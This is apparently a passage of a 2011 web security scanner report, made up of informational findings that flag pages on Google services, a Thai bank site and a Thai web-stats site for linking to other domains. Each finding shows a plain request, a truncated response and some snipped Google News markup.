<div class="title"><a target="_blank" class="usg-AFQjCNHMGDP5R0Cwqrs8PvIQR1opLXfq6A did-9dba5ef5569c8d87 article" href="http://weblogs.baltimoresun.com/news/crime/blog/2011/05/two_baltimore_police_officers.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEVkvHZfxBG9Ws2eEf1upgg8j1FOg did-e55cfbd1ca08ca3 article" href="http://www.baltimoresun.com/news/maryland/baltimore-city/bal-md-ci-juvenile-murder-case-0503,0,1923612.story" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFepeqvAx3lOKfgYt8XJd155YDapg did-15eab239c1de7af6 article" href="http://www.latimes.com/news/opinion/commentary/la-oe-newton-column-mayor-20110502,0,2267373.column" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFCY09nOGNj2MedpTIumPT1UMsHZg did-4628086768f40766 article" href="http://www.washingtontimes.com/news/2011/apr/28/feds-sting-amish-farmer-selling-raw-milk-locally/" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFzygzSi3Lsl_U7e_Ujv5-H4sdMJg did-ff9d2f1c7f733f69 article" href="http://online.wsj.com/article/SB10001424052748703856704576285653184636030.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE4lJ8lyu4a-CBn1p2yh3zsbVbhRw did-e6ff87fa3ba39532 article" href="http://politicalticker.blogs.cnn.com/2011/04/29/trumps-f-bomb-tirade/" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHHjHkxnWsdLLM0rvlbYv2V2iPYXQ did-572b1cf2e7e0f6dc article" href="http://www.nytimes.com/2011/05/01/magazine/mag-01wiig-t.html" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHeKm7r0d3fC2vURQH2dz2JTycRQQ did-34a83095537497b8 article" href="http://www.slate.com/id/2292498/" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEI866WHQnh8USxSWmgh1EGolZsxw did-cfe4cd6900802a6e article" href="http://www.nytimes.com/2011/05/01/realestate/01cov.html" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNG4KbH2eaq8_v-sj74jCjsRxQORDg did-2590cf4cfe79da9b article" href="http://seekingalpha.com/article/266594-dividend-stock-picks-for-the-next-5-years" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE321Tx95rOPIlWVaS4gNLJ5xm7-w did-61af5daf18a005f7 article" href="http://www.msnbc.msn.com/id/42807670/ns/health-kids_and_parenting/" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHajtTuRfFaM7ixansXFEXKFpZnOQ did-c739167a1ca453a3 article" href="http://www.cnn.com/2011/CRIME/04/28/kentucky.arizona.sexual.assault/" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGCvnQCqIXOT6E3_Y2ovzAbx42-Sw did-34b2e3cfc5860012 article" href="http://online.wsj.com/article/SB10001424052748704569404576298953365120630.html" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHGzE_92c-v9su2yFbk765TXkrwqQ did-1c543723d0c4874a article" href="http://www.nytimes.com/2011/05/01/fashion/weddings/01VOWS.html" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/UETIgDoKQlo/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/UETIgDoKQlo/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=UETIgDoKQlo">Bin Laden Raid: How It Happened</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=UETIgDoKQlo">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/7YGITlxfT6s/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/7YGITlxfT6s/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=7YGITlxfT6s">Seth Meyers remarks at the 2011 White House Correspondents&#39; Dinner</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=7YGITlxfT6s">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/lSltVsfH7Ok/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/lSltVsfH7Ok/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=lSltVsfH7Ok">Bin Laden Killing: Help or Hurt Al Qaeda?</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=lSltVsfH7Ok">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Q5yrjQ11Q_A/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Q5yrjQ11Q_A/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Q5yrjQ11Q_A">Charlie Sheen Tours Ala. Tornado Damage</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Q5yrjQ11Q_A">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/sjhUCxVoAnI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/sjhUCxVoAnI/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=sjhUCxVoAnI">AP Top Stories</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=sjhUCxVoAnI">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2XVx_yDj4WTbQnkIQtIBX5b0q4Q did-6b58761708b754eb article" href="http://news.blogs.cnn.com/2011/05/02/obama-to-make-statment-tonight-subject-unknown/" id="7735062201311384811"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGHbUJ2KnDr_jH9-gHMzZA_R6Ajlw did-52b8cfe2af52a329 article" href="http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/" id="5960742679335838505"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEwiQjIg00SREfQV1yimkIIkH8cwg did-12c5eadb0f5b308a article" href="http://abcnews.go.com/Blotter/osama-bin-laden-killed/story?id=13505703" id="1352745489671073930"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENP6vzz7-E6B5U-oBgWAcmNN6XOg did-9e4b421d8ffecef article" href="http://www.cnn.com/2011/WORLD/asiapcf/05/02/bin.laden.dead/?hpt=T1" id="712892698498952431"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGiCRCOfg2E7a1AutyIY-Bkb-mnQw did-19e19aec3fdd046c article" href="http://www.msnbc.msn.com/id/42852700/ns/world_news-south_and_central_asia/" id="1864942060182504556"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGeYht2WZnSFlW90_kh0qgDsJggzQ did-18da50cb44f062b3 article" href="http://www.newyorker.com/online/blogs/newsdesk/2011/05/notes-on-the-death-of-osama-bin-laden.html" id="1790832635798381235"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHwu2yr_WDkUl4PrloL-kpDA68n4Q did-9a5aa6457c9dd6b8 article" href="http://newsfeed.time.com/2011/05/02/may-day-both-hitler-and-bin-laden-announced-dead-on-may-1/" id="-7324359026591017288"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEcdCLaJ5cnM8BJQNvGBIkL0VpF6g did-5a3b56e17e3238a7 article" href="http://www.slate.com/id/2292687/" id="6501886013524293799"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGCfM_7wPMcDmXHutmLjHpZ3ytX3A did-8bab86a7fa6ce30a article" href="http://www.theatlantic.com/national/archive/2011/05/out-of-osamas-death-a-fake-quotation-is-born/238220/" id="-8382458225400945910"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsCmhVa4eAs2sfaeYBS6lNMJh7-Q did-9c55fca74bb6c355 article" href="http://www.politico.com/news/stories/0511/54151.html" id="-7181556235312381099"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFTjR3C-_DVabxpDMTKOjzChgnyEw did-559a0673ac47b5f3 article" href="http://justjared.buzznet.com/2011/04/28/win-tickets-to-see-britney-spears-in-concert/" id="6168249733518702067"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2XVx_yDj4WTbQnkIQtIBX5b0q4Q did-6b58761708b754eb article" href="http://news.blogs.cnn.com/2011/05/02/obama-to-make-statment-tonight-subject-unknown/" id="7735062201311384811"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFYYLzqnZkZEGIhRt0HGo1znJFx1g did-462edb76b050e33a article" href="http://news.blogs.cnn.com/2011/05/01/obama-to-make-statment-tonight-subject-unknown/" id="5057220734394360634"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEahSZNdL-3wZm4yjaYRlrwllzCDQ did-5c9d568e71c93130 article" href="http://www.nytimes.com/2011/05/02/world/asia/osama-bin-laden-is-killed.html?src=twrhp" id="6673585392627298608"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQJqYOVFt6_VzrdbcM_2x7FQ4f1Q did-bf9f42d885f5e1f2 article" href="http://www.huffingtonpost.com/2011/05/01/osama-bin-laden-dead-killed_n_856091.html" id="-4638915593440468494"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNExToQZjXR8E7zRMmjigaLjIckFew did-f0ac20a56477f727 article" href="http://www.nytimes.com/2011/05/02/world/02osama-bin-laden-obituary.html" id="-1104471913885337817"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEwiQjIg00SREfQV1yimkIIkH8cwg did-12c5eadb0f5b308a article" href="http://abcnews.go.com/Blotter/osama-bin-laden-killed/story?id=13505703" id="1352745489671073930"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF5Cx3w4Pj5o5Bs8po_iJHz6zAupw did-fc8334e4b60477d article" href="http://blogs.abcnews.com/george/2011/04/since-president-obama-released-his-birth-certificate-will-donald-trump-release-his-tax-returns.html" id="1137215317276116861"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFB6U8FpjNXkVrOgUSNCGpSOGxs4Q did-6d2bb4d19f3d2cc1 article" href="http://mlb.mlb.com/mlb/events/all_star/y2011/ballot.jsp?tcid=news-asgballot-2011" id="7866579986545454273"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEYwUcvCeLdflK14gF_vtaZBfRZbA did-906b3ec687d3fff3 article" href="http://www.msnbc.msn.com/id/42853221/ns/world_news-south_and_central_asia/" id="-8040263687336624141"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFTjR3C-_DVabxpDMTKOjzChgnyEw did-559a0673ac47b5f3 article" href="http://justjared.buzznet.com/2011/04/28/win-tickets-to-see-britney-spears-in-concert/" id="6168249733518702067"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2XVx_yDj4WTbQnkIQtIBX5b0q4Q did-6b58761708b754eb article" href="http://news.blogs.cnn.com/2011/05/02/obama-to-make-statment-tonight-subject-unknown/" id="7735062201311384811"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFYYLzqnZkZEGIhRt0HGo1znJFx1g did-462edb76b050e33a article" href="http://news.blogs.cnn.com/2011/05/01/obama-to-make-statment-tonight-subject-unknown/" id="5057220734394360634"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEm37jQsO0PORLsvEF7wYgUt0AaOg did-66d8c661c9cfb025 article" href="http://www.nytimes.com/2011/04/17/magazine/mag-17Sugar-t.html" id="7410891310138109989"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEahSZNdL-3wZm4yjaYRlrwllzCDQ did-5c9d568e71c93130 article" href="http://www.nytimes.com/2011/05/02/world/asia/osama-bin-laden-is-killed.html?src=twrhp" id="6673585392627298608"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNF3GW3-ALeB0qqLxvzWVA-xwnxitA did-c9789480a85ca486 article" href="http://www.mtv.com/news/articles/1662416/time-100-most-influential-people-justin-bieber.jhtml" id="-3929227394579389306"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQJqYOVFt6_VzrdbcM_2x7FQ4f1Q did-bf9f42d885f5e1f2 article" href="http://www.huffingtonpost.com/2011/05/01/osama-bin-laden-dead-killed_n_856091.html" id="-4638915593440468494"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEB_RGWaVyuKtSCCjJLs8Si3RvA0g did-e175254c0fc8e803 article" href="http://www.businessweek.com/magazine/content/11_17/b4225060960537.htm" id="-2200811834288052221"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEwiQjIg00SREfQV1yimkIIkH8cwg did-12c5eadb0f5b308a article" href="http://abcnews.go.com/Blotter/osama-bin-laden-killed/story?id=13505703" id="1352745489671073930"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGsrXJda6h2n1x1JmCvNXPXgjVe2Q did-f6957594ca5e4e4f article" href="http://www.wired.com/gadgetlab/2011/04/iphone-tracks/" id="-678506886938603953"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

22.20. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lh/view?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Tue, 03 May 2011 13:23:22 GMT
Date: Tue, 03 May 2011 13:23:22 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=_M2A6TmMWV3e; Path=/; HttpOnly
Set-Cookie: S=photos_html=BN-ZTKF8p8ulsg-iHtnWgA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/73.27/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/73.27/script/lh_searchview.js"></script>
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=barkley+bank&hl=en&ie=UTF-8&tab=q1">YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/73.27/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/73.27/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

22.21. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Tue, 03 May 2011 13:23:26 GMT
Date: Tue, 03 May 2011 13:23:26 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=E8VyoQOVmaTQ; Path=/; HttpOnly
Set-Cookie: S=photos_html=kjkfJWM3nL2suXT254Ij7w; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/73.27/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/73.27/script/lh_searchview.js"></script>
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1">YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/73.27/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
<td id="lhid_trayhandle" class="gphoto-trayhandle
">
<img src="http://lh5.ggpht.com/s/v/73.27/img/transparent.gif" class="" id="lhid_trayhandle_icon" />
</td>
...[SNIP]...
</a> -
<a href="http://googlephotos.blogspot.com" target="_blank">Blog</a>
...[SNIP]...

22.22. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tradinginfo.services/price_update.php?lang=E HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:52 GMT
Server: Apache
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 1827

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...
<td align="right" class="cssRB"><a href="http://www.bangkokbank.com/Bangkok+Bank/For+Shareholders/Share+Price+and+Volume/default.htm" class="Link1" target="_top">More&#187;</a>
...[SNIP]...

22.23. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /translate_t?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:29 GMT
Expires: Tue, 03 May 2011 13:27:29 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=a58bf33b55cf03ae:TM=1304429249:LM=1304429249:S=2Q-mtL5Z9O-LdcLD; expires=Thu, 02-May-2013 13:27:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

22.24. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /translate_t?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:26 GMT
Expires: Tue, 03 May 2011 13:27:26 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=71e2231686a4df92:TM=1304429246:LM=1304429246:S=UZVNqCuXSydjzUQK; expires=Thu, 02-May-2013 13:27:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=barkley+bank&um=1&ie=UTF-8&hl=en&sa=N&tab=T1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="input_tts_button" style="" class=" tts_vertical_bt"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="input_tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...
<div id="tts_button" style="" class=" "><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="18" height="18" id="tts_flash"><param value="http://www.gstatic.com/translate/sound_player2.swf" name="movie"/>
...[SNIP]...

22.25. http://truehits.net/stat.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://truehits.net
Path:   /stat.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /stat.php?id=q0027704 HTTP/1.1
Host: truehits.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/html
Connection: close
Date: Tue, 03 May 2011 13:27:48 GMT
Server: Apache
Content-Length: 50379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="search" type="ap
...[SNIP]...
<br />
<a href="http://bravia.sony.co.th/?CID=bravia:truehitsearch" target="_blank">LCD TV</a><br />
<a href="http://bravia.sony.co.th/?CID=bravia:truehitsearch" target="_blank">LED TV</a><br />
<a href="http://my.sony.co.th/shopping/th/home.aspx/?CID=Sonystyle:truehitsearch" target="_blank">........</a><br />
<a href="http://my.sony.co.th/shopping/th/store/store.aspx?Category=1?CID=Sonystyle:truehitsearch" target="_blank">Notebook</a><br />
<a href="http://dslr.sony.co.th/?CID=bravia:truehitsearch" target="_blank">dslr</a><br />
<a href="http://vaio.sony.co.th/?CID=bravia:truehitsearch" target="_blank">vaio</a><br />
<a href="http://cybershot.sony.co.th/?CID=bravia:truehitsearch" target="_blank">cybershot</a><br />
<a href="http://bloggie.sony.co.th/?CID=bravia:truehitsearch" target="_blank">bloggie</a>
...[SNIP]...
<br />
<a href="http://www.thaisite.net" class="smalltext10">Hosting</a><br />
<a href="http://game.mthai.com" target="_blank" class="smalltext10">...</a><br />
<a href="http://www.lh.co.th" target="_blank" class="smalltext10">....</a><br />
<a href="http://www.lh.co.th" target="_blank" class="smalltext10">.....</a><br />
<a href="http://www.nangdee.com" target="_blank" class="smalltext10">........</a><br />
<a href="http://exclusive.naddate.com" target="_blank" class="smalltext10">.....</a><br />
<a href="http://www.thainotebook.com" target="_blank" class="smalltext10">notebook</a><br />
<a href="http://www.securitythai.com" target="_blank" class="smalltext10">............</a><br />
<a href="http://www.securitythai.com/finger_scan.php" target="_blank" class="smalltext10">finger scan</a>
...[SNIP]...
<br />
<a href="http://www.swimmingpooltile.net" target="_blank" class="smalltext10">Swimming pool tile</a><br />
<a href="http://www.securitythai.com/digitalA_DLHD-8001.php" target="_blank" class="smalltext10">....... </a><br />
<a href="http://www.thaienergysaving.com" target="_blank" class="smalltext10">.................................</a><br />
